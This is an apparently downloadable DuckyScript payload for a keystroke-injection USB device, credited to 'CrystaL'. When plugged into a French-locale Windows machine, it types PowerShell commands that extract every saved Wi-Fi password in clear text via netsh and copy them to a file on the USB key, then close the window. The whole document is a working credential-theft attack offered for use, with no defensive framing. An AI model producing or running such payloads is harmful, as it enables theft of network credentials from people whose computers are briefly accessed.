REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Thank you for downloading this script.%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% This script was written and tested by CrystaL.%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%% Warning: never connect 2 USB keys at the same time (this script automatically recognises a connected USB key).%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 500
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
STRING $wifiProfiles = netsh wlan show profiles | Select-String "Tous les utilisateurs" | ForEach-Object {
DELAY 1000
ENTER
STRING    ($_ -split ":")[1].Trim()
ENTER
STRING }
ENTER
STRING $results = ""
ENTER
STRING foreach ($profile in $wifiProfiles) {
ENTER
STRING    $results += "`n==== $profile ====`n"
ENTER
STRING    $details = netsh wlan show profile name="$profile" key=clear
ENTER
STRING    $passwordLine = $details | Select-String "Contenu de la clé"
ENTER
STRING    if ($passwordLine) {
ENTER
STRING        $results += $passwordLine.Line + "`n"
ENTER
STRING    } else {
ENTER
STRING        $results += "Aucun mot de passe trouvé.`n"
ENTER
STRING    }
ENTER
STRING }

STRING $usbDrive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Select-Object -First 1 -ExpandProperty DeviceID
ENTER
STRING $results | Out-File "$usbDrive\wifi_passwords.txt"
ENTER
DELAY 1000
ALT F4
